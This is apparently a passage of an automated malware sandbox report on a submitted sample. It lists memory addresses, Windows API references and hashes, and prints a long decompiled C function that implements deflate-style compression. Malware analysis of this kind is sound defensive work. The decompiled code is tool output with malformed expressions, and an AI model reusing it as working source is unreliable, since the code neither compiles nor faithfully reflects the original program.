                                                                                        0x00d17139
                                                                                        0x00d1713c
                                                                                        0x00d1713f
                                                                                        0x00d17144
                                                                                        0x00d17149
                                                                                        0x00d17149
                                                                                        0x00d17013
                                                                                        0x00d17013
                                                                                        0x00000000
                                                                                        0x00d17013
                                                                                        0x00d16fff
                                                                                        0x00d1714e
                                                                                        0x00d17153
                                                                                        0x00d17159
                                                                                        0x00d1715f
                                                                                        0x00d171f3
                                                                                        0x00d171f7
                                                                                        0x00d171fa
                                                                                        0x00d171fd
                                                                                        0x00d17203
                                                                                        0x00d17205
                                                                                        0x00d17205
                                                                                        0x00d1720b
                                                                                        0x00d17210
                                                                                        0x00d17212
                                                                                        0x00d17212
                                                                                        0x00d17215
                                                                                        0x00d17219
                                                                                        0x00d1721d
                                                                                        0x00d17205
                                                                                        0x00d17223
                                                                                        0x00d17228
                                                                                        0x00d1722c
                                                                                        0x00d17235
                                                                                        0x00d17238
                                                                                        0x00d17238
                                                                                        0x00d1723e
                                                                                        0x00d17243
                                                                                        0x00d17245
                                                                                        0x00d17245
                                                                                        0x00d17248
                                                                                        0x00d1724c
                                                                                        0x00d17250
                                                                                        0x00d17238
                                                                                        0x00d17256
                                                                                        0x00d17260
                                                                                        0x00d17260
                                                                                        0x00d17268
                                                                                        0x00d1726b
                                                                                        0x00d1726b
                                                                                        0x00d1726e
                                                                                        0x00d17274
                                                                                        0x00d17276
                                                                                        0x00d17276
                                                                                        0x00d1727c
                                                                                        0x00d17281
                                                                                        0x00d17283
                                                                                        0x00d17283
                                                                                        0x00d17286
                                                                                        0x00d1728a
                                                                                        0x00d1728e
                                                                                        0x00d17276
                                                                                        0x00d17294
                                                                                        0x00d1729a
                                                                                        0x00d1729a
                                                                                        0x00d17165
                                                                                        0x00d17167
                                                                                        0x00d1716b
                                                                                        0x00d17174
                                                                                        0x00d17177
                                                                                        0x00d17177
                                                                                        0x00d1717d
                                                                                        0x00d17182
                                                                                        0x00d17184
                                                                                        0x00d17184
                                                                                        0x00d17187
                                                                                        0x00d1718b
                                                                                        0x00d1718f
                                                                                        0x00d17177
                                                                                        0x00d1719c
                                                                                        0x00d171a2
                                                                                        0x00d171a5
                                                                                        0x00d171b0
                                                                                        0x00d171b0
                                                                                        0x00d171ba
                                                                                        0x00d171bd
                                                                                        0x00d171bd
                                                                                        0x00d171c0
                                                                                        0x00d171c6
                                                                                        0x00d171c8
                                                                                        0x00d171c8
                                                                                        0x00d171ce
                                                                                        0x00d171d3
                                                                                        0x00d171d5
                                                                                        0x00d171d5
                                                                                        0x00d171d8
                                                                                        0x00d171dc
                                                                                        0x00d171e0
                                                                                        0x00d171c8
                                                                                        0x00d171e6
                                                                                        0x00d171e9
                                                                                        0x00d171e9
                                                                                        0x00d171ec
                                                                                        0x00d1719c
                                                                                        0x00d1715f
                                                                                        0x00d172ab
                                                                                        0x00d172bc
                                                                                        0x00d172cb
                                                                                        0x00d172d1
                                                                                        0x00d172da
                                                                                        0x00d172e0
                                                                                        0x00d172e3
                                                                                        0x00d172e6
                                                                                        0x00d172ed
                                                                                        0x00d172f4
                                                                                        0x00d172f6
                                                                                        0x00d17382
                                                                                        0x00d1738b
                                                                                        0x00d172fc
                                                                                        0x00d172ff
                                                                                        0x00d17336
                                                                                        0x00d1733e
                                                                                        0x00d1737c
                                                                                        0x00000000
                                                                                        0x00d17340
                                                                                        0x00d17343
                                                                                        0x00d17352
                                                                                        0x00d1735a
                                                                                        0x00d17360
                                                                                        0x00d17369
                                                                                        0x00d1736b
                                                                                        0x00000000
                                                                                        0x00d1736d
                                                                                        0x00d1736d
                                                                                        0x00d17373
                                                                                        0x00d1737b
                                                                                        0x00d1737b
                                                                                        0x00d1736b
                                                                                        0x00d17301
                                                                                        0x00d1730d
                                                                                        0x00d1731c
                                                                                        0x00d17323
                                                                                        0x00000000
                                                                                        0x00d17326
                                                                                        0x00d17326
                                                                                        0x00d17335
                                                                                        0x00d17335
                                                                                        0x00d17323
                                                                                        0x00d172ff

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID:
                                                                                        • API String ID: 2221118986-0
                                                                                        • Opcode ID: b1329d619994385c61a80d26e4d2424dcc3cc95130a32a3d2ad376b2af831199
                                                                                        • Instruction ID: 293bf6f1df64e886a3b596ebfe231a1edad940b1611ee00523b85e8e372d50da
                                                                                        • Opcode Fuzzy Hash: b1329d619994385c61a80d26e4d2424dcc3cc95130a32a3d2ad376b2af831199
                                                                                        • Instruction Fuzzy Hash: 6A025370505B109FC735CF28D6846A6B7F0BF54724B240A2ED5E786EA1DB32F886CB24
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlGetVersion.NTDLL(?), ref: 00D18D6D
                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00D18D77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoNativeSystemVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2296905803-0
                                                                                        • Opcode ID: a7ce85528326ce461283ccbd1c8957336596c24b1208bc1b93d3ce0525380c0b
                                                                                        • Instruction ID: 61b9395aeb4d1566699cca1a6f8a59e567d512bc26828289657f84fe7dd194ca
                                                                                        • Opcode Fuzzy Hash: a7ce85528326ce461283ccbd1c8957336596c24b1208bc1b93d3ce0525380c0b
                                                                                        • Instruction Fuzzy Hash: 8FF03132D506185BF751CF6ACC056C8B7F9E788304F0481A0E42DF6609D6B4EA56DB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 99%
                                                                                        			E00D177F0(intOrPtr* __ecx) {
                                                                                        				signed int _v8;
                                                                                        				intOrPtr* _v12;
                                                                                        				signed int _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _v32;
                                                                                        				intOrPtr* _v36;
                                                                                        				signed int _v40;
                                                                                        				signed int _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				signed int _v52;
                                                                                        				signed int _v56;
                                                                                        				char _v60;
                                                                                        				signed int _v64;
                                                                                        				signed int _v68;
                                                                                        				intOrPtr _v72;
                                                                                        				intOrPtr* _v76;
                                                                                        				intOrPtr _t375;
                                                                                        				signed int _t380;
                                                                                        				signed int _t381;
                                                                                        				signed int _t382;
                                                                                        				signed int _t390;
                                                                                        				void* _t402;
                                                                                        				signed int _t410;
                                                                                        				unsigned int* _t411;
                                                                                        				unsigned int* _t420;
                                                                                        				signed int _t432;
                                                                                        				unsigned int* _t434;
                                                                                        				unsigned int* _t451;
                                                                                        				unsigned int* _t453;
                                                                                        				void* _t463;
                                                                                        				void* _t480;
                                                                                        				signed int _t483;
                                                                                        				signed int _t494;
                                                                                        				signed char _t504;
                                                                                        				signed int _t508;
                                                                                        				signed int _t509;
                                                                                        				signed char _t510;
                                                                                        				signed int _t511;
                                                                                        				signed int _t513;
                                                                                        				signed int _t514;
                                                                                        				intOrPtr* _t516;
                                                                                        				intOrPtr* _t517;
                                                                                        				intOrPtr _t520;
                                                                                        				intOrPtr _t522;
                                                                                        				intOrPtr _t523;
                                                                                        				signed int _t524;
                                                                                        				signed int _t528;
                                                                                        				signed char* _t531;
                                                                                        				void* _t534;
                                                                                        				signed char _t538;
                                                                                        				signed char _t543;
                                                                                        				void* _t548;
                                                                                        				void* _t550;
                                                                                        				intOrPtr* _t551;
                                                                                        				intOrPtr _t555;
                                                                                        				intOrPtr _t556;
                                                                                        				intOrPtr _t557;
                                                                                        				intOrPtr _t558;
                                                                                        				signed int _t564;
                                                                                        				intOrPtr* _t567;
                                                                                        				intOrPtr* _t571;
                                                                                        				intOrPtr _t572;
                                                                                        				signed int _t573;
                                                                                        				signed int _t575;
                                                                                        				signed int _t576;
                                                                                        				signed int _t579;
                                                                                        				signed int _t582;
                                                                                        				intOrPtr _t585;
                                                                                        				signed int _t587;
                                                                                        				signed int _t590;
                                                                                        				signed int _t591;
                                                                                        				signed int _t592;
                                                                                        				void* _t594;
                                                                                        				signed int _t595;
                                                                                        				signed int _t600;
                                                                                        				intOrPtr _t601;
                                                                                        				signed int _t602;
                                                                                        				signed int _t603;
                                                                                        				signed int _t604;
                                                                                        				signed int _t605;
                                                                                        				signed int _t606;
                                                                                        				signed int _t608;
                                                                                        				signed int _t610;
                                                                                        				intOrPtr* _t612;
                                                                                        
                                                                                        				_t612 = __ecx;
                                                                                        				_v76 = __ecx;
                                                                                        				_t571 =  *((intOrPtr*)(__ecx + 0x84));
                                                                                        				_t601 =  *((intOrPtr*)(__ecx + 0x88));
                                                                                        				_t375 =  *((intOrPtr*)(__ecx + 0x80));
                                                                                        				_v12 = _t571;
                                                                                        				_v20 = _t601;
                                                                                        				_v48 = _t375;
                                                                                        				L2:
                                                                                        				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
                                                                                        					_t520 =  *((intOrPtr*)(_t612 + 0x20));
                                                                                        					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
                                                                                        						if(_t601 != 0) {
                                                                                        							while(1) {
                                                                                        								_t557 =  *((intOrPtr*)(_t612 + 0x20));
                                                                                        								if(_t557 >= 0x102) {
                                                                                        									goto L11;
                                                                                        								}
                                                                                        								_t601 = _t601 - 1;
                                                                                        								_t510 =  *_t571;
                                                                                        								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
                                                                                        								_v20 = _t601;
                                                                                        								_t571 = _t571 + 1;
                                                                                        								_v12 = _t571;
                                                                                        								 *(_t483 + _t612 + 0x90) = _t510;
                                                                                        								if(_t483 < 0x101) {
                                                                                        									 *(_t483 + _t612 + 0x8090) = _t510;
                                                                                        								}
                                                                                        								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
                                                                                        								_t558 =  *((intOrPtr*)(_t612 + 0x20));
                                                                                        								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
                                                                                        									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
                                                                                        									_t579 = _t608 & 0x00007fff;
                                                                                        									_t89 = _t608 + 1; // 0x11
                                                                                        									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
                                                                                        									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
                                                                                        									_t571 = _v12;
                                                                                        									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
                                                                                        									_t601 = _v20;
                                                                                        								}
                                                                                        								if(_t601 != 0) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        								}
                                                                                        								goto L11;
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t494 =  *(_t612 + 0x1c) + _t520;
                                                                                        						_t610 = _t494 & 0x00007fff;
                                                                                        						_t13 = _t494 - 2; // 0xe
                                                                                        						_t511 = _t13;
                                                                                        						_t16 = _t511 + 1; // 0xf
                                                                                        						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
                                                                                        						_t502 =  <  ? _v20 : 0x102 - _t520;
                                                                                        						_v20 = _v20 - 0x102;
                                                                                        						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
                                                                                        						_v56 = _v12 + 0x102;
                                                                                        						_t567 = _v12;
                                                                                        						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
                                                                                        						while(_t567 != _v56) {
                                                                                        							_t504 =  *_t567;
                                                                                        							_v12 = _t567 + 1;
                                                                                        							 *(_t612 + _t610 + 0x90) = _t504;
                                                                                        							if(_t610 < 0x101) {
                                                                                        								 *(_t610 + _t612 + 0x8090) = _t504;
                                                                                        							}
                                                                                        							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
                                                                                        							_t610 = _t610 + 0x00000001 & 0x00007fff;
                                                                                        							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
                                                                                        							_t567 = _v12;
                                                                                        							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
                                                                                        							_t511 = _t511 + 1;
                                                                                        						}
                                                                                        						_t601 = _v20;
                                                                                        					}
                                                                                        					L11:
                                                                                        					_t572 =  *((intOrPtr*)(_t612 + 0x20));
                                                                                        					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
                                                                                        					_v24 = _t522;
                                                                                        					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
                                                                                        					if(_v48 != 0 || _t572 >= 0x102) {
                                                                                        						_t380 =  *((intOrPtr*)(_t612 + 0x50));
                                                                                        						_t602 = 0;
                                                                                        						_v64 = _t380;
                                                                                        						_v56 = 1;
                                                                                        						_t508 =  !=  ? _t380 : 2;
                                                                                        						_v8 = 0;
                                                                                        						_t381 =  *(_t612 + 0x1c);
                                                                                        						_v28 = _t381;
                                                                                        						_v28 = _v28 & 0x00007fff;
                                                                                        						_v16 = 2;
                                                                                        						if(( *(_t612 + 8) & 0x00090000) == 0) {
                                                                                        							_t382 = _t381 & 0x00007fff;
                                                                                        							_t523 = _v24;
                                                                                        							_v32 = _t382;
                                                                                        							_t603 = _t382;
                                                                                        							_v52 = 2;
                                                                                        							asm("sbb eax, eax");
                                                                                        							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
                                                                                        							_v72 = _t612 + 0x90;
                                                                                        							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
                                                                                        							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
                                                                                        							if(_t572 > 2) {
                                                                                        								while(1) {
                                                                                        									_t125 =  &_v60;
                                                                                        									 *_t125 = _v60 - 1;
                                                                                        									if( *_t125 == 0) {
                                                                                        										goto L33;
                                                                                        									}
                                                                                        									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
                                                                                        									if(_t604 == 0) {
                                                                                        										goto L33;
                                                                                        									} else {
                                                                                        										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
                                                                                        										_v40 = _t592;
                                                                                        										if(_t592 > _t523) {
                                                                                        											goto L33;
                                                                                        										} else {
                                                                                        											_t603 = _t604 & 0x00007fff;
                                                                                        											_t548 = _v52 + _t612;
                                                                                        											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
                                                                                        												L51:
                                                                                        												if(_t592 == 0) {
                                                                                        													goto L33;
                                                                                        												} else {
                                                                                        													_t523 = _v24;
                                                                                        													_t516 = _t612 + 0x90 + _t603;
                                                                                        													if( *_t516 != _v68) {
                                                                                        														_t508 = _v16;
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														_t550 = _v32 + _t612 + 0x90;
                                                                                        														_t594 = 0x20;
                                                                                        														while(1) {
                                                                                        															_t160 = _t550 + 2; // 0x7401fe83
                                                                                        															_t551 = _t550 + 2;
                                                                                        															_t517 = _t516 + 2;
                                                                                        															if( *_t160 !=  *_t517) {
                                                                                        																break;
                                                                                        															}
                                                                                        															_t161 = _t551 + 2; // 0xfe83f08b
                                                                                        															_t551 = _t551 + 2;
                                                                                        															_t517 = _t517 + 2;
                                                                                        															if( *_t161 ==  *_t517) {
                                                                                        																_t162 = _t551 + 2; // 0xf08bffff
                                                                                        																_t551 = _t551 + 2;
                                                                                        																_t517 = _t517 + 2;
                                                                                        																if( *_t162 ==  *_t517) {
                                                                                        																	_t163 = _t551 + 2; // 0xfffffe61
                                                                                        																	_t551 = _t551 + 2;
                                                                                        																	_t517 = _t517 + 2;
                                                                                        																	if( *_t163 ==  *_t517) {
                                                                                        																		_t594 = _t594 - 1;
                                                                                        																		if(_t594 != 0) {
                                                                                        																			continue;
                                                                                        																		}
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        															break;
                                                                                        														}
                                                                                        														_v36 = _t551;
                                                                                        														_t595 = _v40;
                                                                                        														if(_t594 == 0) {
                                                                                        															_t602 = _t595;
                                                                                        															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
                                                                                        															_v16 = 0x102;
                                                                                        															goto L34;
                                                                                        														} else {
                                                                                        															_t612 = _v76;
                                                                                        															_t508 = _v16;
                                                                                        															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
                                                                                        															_t523 = _v24;
                                                                                        															if(_t463 <= _v52) {
                                                                                        																continue;
                                                                                        															} else {
                                                                                        																_v8 = _v40;
                                                                                        																_t555 =  *((intOrPtr*)(_t612 + 0x20));
                                                                                        																_t600 =  <  ? _t555 : _t463;
                                                                                        																_v52 = _t600;
                                                                                        																_t508 = _t600;
                                                                                        																_v16 = _t508;
                                                                                        																if(_t600 == _t555) {
                                                                                        																	goto L33;
                                                                                        																} else {
                                                                                        																	_t523 = _v24;
                                                                                        																	_t184 = _t612 + 0x8f; // 0xd1279020
                                                                                        																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
                                                                                        																	continue;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
                                                                                        												if(_t605 == 0) {
                                                                                        													goto L33;
                                                                                        												} else {
                                                                                        													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
                                                                                        													_v40 = _t592;
                                                                                        													if(_t592 > _v24) {
                                                                                        														goto L33;
                                                                                        													} else {
                                                                                        														_t603 = _t605 & 0x00007fff;
                                                                                        														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
                                                                                        															goto L51;
                                                                                        														} else {
                                                                                        															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
                                                                                        															if(_t606 == 0) {
                                                                                        																goto L33;
                                                                                        															} else {
                                                                                        																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
                                                                                        																_v40 = _t592;
                                                                                        																if(_t592 > _v24) {
                                                                                        																	goto L33;
                                                                                        																} else {
                                                                                        																	_t603 = _t606 & 0x00007fff;
                                                                                        																	_t523 = _v24;
                                                                                        																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
                                                                                        																		continue;
                                                                                        																	} else {
                                                                                        																		goto L51;
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									L95:
                                                                                        									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
                                                                                        									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
                                                                                        									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
                                                                                        									_t530 =  <  ? _t402 : 0x8000;
                                                                                        									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
                                                                                        									_t531 =  *(_t612 + 0x28);
                                                                                        									if(_t531 > _t612 + 0x1926a) {
                                                                                        										L99:
                                                                                        										_t601 = _v20;
                                                                                        										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
                                                                                        										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
                                                                                        										_t534 = E00D16E70(_t612, 0);
                                                                                        										if(_t534 != 0) {
                                                                                        											return 0 | _t534 > 0x00000000;
                                                                                        										} else {
                                                                                        											_t375 = _v48;
                                                                                        											goto L1;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
                                                                                        										_t601 = _v20;
                                                                                        										_t375 = _v48;
                                                                                        										if(_t585 <= 0x7c00) {
                                                                                        											L1:
                                                                                        											_t571 = _v12;
                                                                                        											goto L2;
                                                                                        										} else {
                                                                                        											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
                                                                                        												goto L99;
                                                                                        											} else {
                                                                                        												_t375 = _v48;
                                                                                        												if(( *(_t612 + 8) & 0x00080000) == 0) {
                                                                                        													goto L1;
                                                                                        												} else {
                                                                                        													goto L99;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									goto L103;
                                                                                        								}
                                                                                        								goto L33;
                                                                                        							} else {
                                                                                        								L33:
                                                                                        								_t602 = _v8;
                                                                                        							}
                                                                                        							goto L34;
                                                                                        						} else {
                                                                                        							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
                                                                                        								L34:
                                                                                        								if(_t508 != 3 || _t602 < 0x2000) {
                                                                                        									goto L36;
                                                                                        								} else {
                                                                                        									_t573 = _v28;
                                                                                        									_t524 =  *(_t612 + 8);
                                                                                        									goto L65;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t508 = 0;
                                                                                        								_v16 = 0;
                                                                                        								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
                                                                                        								if(_t572 == 0) {
                                                                                        									L31:
                                                                                        									_t508 = 0;
                                                                                        									_v16 = 0;
                                                                                        									L36:
                                                                                        									_t573 = _v28;
                                                                                        									_t524 =  *(_t612 + 8);
                                                                                        									if(_t573 == _t602) {
                                                                                        										L65:
                                                                                        										_t508 = 0;
                                                                                        										_t602 = 0;
                                                                                        										_v16 = 0;
                                                                                        									} else {
                                                                                        										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
                                                                                        											goto L65;
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t480 = _v28 + _t612;
                                                                                        									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
                                                                                        										_t508 = _t508 + 1;
                                                                                        										if(_t508 < _t572) {
                                                                                        											continue;
                                                                                        										}
                                                                                        										break;
                                                                                        									}
                                                                                        									_v16 = _t508;
                                                                                        									if(_t508 < 3) {
                                                                                        										goto L31;
                                                                                        									} else {
                                                                                        										_t602 = 1;
                                                                                        										goto L34;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						_t390 = _v64;
                                                                                        						if(_t390 == 0) {
                                                                                        							if(_t602 != 0) {
                                                                                        								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
                                                                                        									_t316 = _t508 - 3; // -3
                                                                                        									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
                                                                                        									_t319 = _t602 - 1; // -1
                                                                                        									_t509 = _t319;
                                                                                        									_t575 = _t509 >> 8;
                                                                                        									 *( *(_t612 + 0x28)) = _t316;
                                                                                        									( *(_t612 + 0x28))[1] = _t509;
                                                                                        									( *(_t612 + 0x28))[2] = _t575;
                                                                                        									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
                                                                                        									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
                                                                                        									_t327 = _t612 + 0x38;
                                                                                        									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                                                                                        									if( *_t327 == 0) {
                                                                                        										_t411 =  *(_t612 + 0x28);
                                                                                        										 *(_t612 + 0x2c) = _t411;
                                                                                        										 *((intOrPtr*)(_t612 + 0x38)) = 8;
                                                                                        										 *(_t612 + 0x28) =  &(_t411[0]);
                                                                                        									}
                                                                                        									_t576 = _t575 & 0x0000007f;
                                                                                        									_t333 = (_t509 & 0x000001ff) + 0xd1b220; // 0x201001d
                                                                                        									_t334 = _t576 + 0xd1b1a0; // 0x12000000
                                                                                        									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
                                                                                        									_t528 = _v16;
                                                                                        									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
                                                                                        									if(_t528 >= 3) {
                                                                                        										_t410 =  *(0xd1b41a + _t528 * 2) & 0x0000ffff;
                                                                                        										goto L94;
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t528 = _v56;
                                                                                        									_t414 =  <  ? _t573 : 0x8100;
                                                                                        									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
                                                                                        									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
                                                                                        									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t417 =  <  ? _t573 : 0x8100;
                                                                                        								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
                                                                                        								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
                                                                                        								 *( *(_t612 + 0x28)) = _t538;
                                                                                        								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
                                                                                        								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
                                                                                        								_t299 = _t612 + 0x38;
                                                                                        								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                                                                                        								if( *_t299 == 0) {
                                                                                        									_t420 =  *(_t612 + 0x28);
                                                                                        									 *(_t612 + 0x2c) = _t420;
                                                                                        									 *((intOrPtr*)(_t612 + 0x38)) = 8;
                                                                                        									 *(_t612 + 0x28) =  &(_t420[0]);
                                                                                        								}
                                                                                        								_t410 = _t538 & 0x000000ff;
                                                                                        								_t528 = _v56;
                                                                                        								L94:
                                                                                        								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
                                                                                        							}
                                                                                        						} else {
                                                                                        							if(_t508 <= _t390) {
                                                                                        								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
                                                                                        								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
                                                                                        								 *( *(_t612 + 0x28)) = _t390 - 3;
                                                                                        								_t587 = _t513 >> 8;
                                                                                        								( *(_t612 + 0x28))[1] = _t513;
                                                                                        								( *(_t612 + 0x28))[2] = _t587;
                                                                                        								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
                                                                                        								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
                                                                                        								_t266 = _t612 + 0x38;
                                                                                        								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                                                                                        								if( *_t266 == 0) {
                                                                                        									_t434 =  *(_t612 + 0x28);
                                                                                        									 *(_t612 + 0x2c) = _t434;
                                                                                        									 *((intOrPtr*)(_t612 + 0x38)) = 8;
                                                                                        									 *(_t612 + 0x28) =  &(_t434[0]);
                                                                                        								}
                                                                                        								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0xd1b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xd1b1a0) & 0x000000ff;
                                                                                        								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0xd1b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xd1b1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0xd1b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xd1b1a0) & 0x000000ff) * 2)) + 1;
                                                                                        								_t432 = _v64;
                                                                                        								if(_t432 >= 3) {
                                                                                        									 *((short*)(_t612 + 0x8192 + ( *(0xd1b41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0xd1b41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
                                                                                        								}
                                                                                        								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
                                                                                        								 *((intOrPtr*)(_t612 + 0x50)) = 0;
                                                                                        							} else {
